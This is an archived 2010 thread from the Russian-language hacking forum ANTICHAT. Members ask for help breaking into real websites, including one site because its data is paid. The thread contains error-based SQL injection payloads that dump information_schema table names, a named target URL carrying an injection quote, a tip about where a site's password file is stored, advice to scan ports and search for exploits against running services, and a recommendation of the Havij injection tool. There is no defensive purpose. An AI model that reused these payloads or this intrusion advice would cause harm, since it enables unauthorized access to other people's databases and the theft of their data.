ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.09.2010, 13:34
|
|
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме:
6183433
Репутация:
1521
|
|
http://newsmarked.info/userrss.php?user=hiioarvey&status=1'
не могу раскрутить
|
|
|
05.09.2010, 14:55
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
daniel_1024спасибо! разобрался
пароли храняца в /home/admin/.shadow
|
|
|
|
05.09.2010, 18:59
|
|
Новичок
Регистрация: 05.06.2010
Сообщений: 0
Провел на форуме:
18765
Репутация:
0
|
|
Привет всем. Что можно сделать с этим?
Код:
Code:
warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.
|
|
|
|
05.09.2010, 19:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
73373
Репутация:
7
|
|
Сообщение от just_panic
just_panic said:
Привет всем. Что можно сделать с этим?
Код:
Code:
warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.
Это читалка, ничего с этим не сделаешь..
|
|
|
|
05.09.2010, 19:07
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
очень заинтересован базой одной сайты (инфа плтная).
адрес допустим такой:
http://site.aa.su/
если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/
т.е. никаких файлов нету, чтоб мне понять что к чему.
сайт самописный.
Как узнать что за БД ?? и возможноси проникновения ?
|
|
|
|
05.09.2010, 22:30
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от B1t.exe
B1t.exe said:
очень заинтересован базой одной сайты (инфа плтная).
адрес допустим такой:
http://site.aa.su/
если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/
т.е. никаких файлов нету, чтоб мне понять что к чему.
сайт самописный.
Как узнать что за БД ?? и возможноси проникновения ?
Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта.
Если совсем глухо и не получается сломать из веба, сканируй открытые порты, смотри, что на них висит, коннекться к ним телнетом, чтобы узнать версии демонов и ищи под них эксплойты.
То, что ты описал, называется Mod_Rewrite.
|
|
|
|
06.09.2010, 00:23
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
есть запрос
Код:
Code:
+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+206,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле? |
|
|
|
06.09.2010, 00:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от BrainDeaD
BrainDeaD said:
есть запрос
Код:
Code:
+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+206,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле? юзай havij, лимитом перебирает все, а так груп конкат не юзать все равно )
|
|
|
|
06.09.2010, 00:42
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Сообщение от None
Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта.
Не знаю чем и как делать (
Сообщение от None
сканируй открытые порты, смотри, что на них висит
никак не получаеться. я думаю специально сделали на домене 3_го уровня, чтоб невозможно было даже IP адрес ловить. встроенные утилиты wind ничего не могут определить(ping, nslookup, tracert), т.е. IP адрес.
А вот XSpider тоже молчит ****:
Сообщение от None
Сканирование хоста не производилось, так как невозможно получить IP-адрес по заданному имени хоста.
|
|
|
|
06.09.2010, 00:53
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
Сообщение от Konqi
Konqi said:
юзай havij, лимитом перебирает все, а так груп конкат не юзать все равно )
ок. попробую.
а что на счёт бенчмарка с переменными? типа
Код:
Code:
concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCAT(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by table_name+LIMIT+1))),@o)
никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
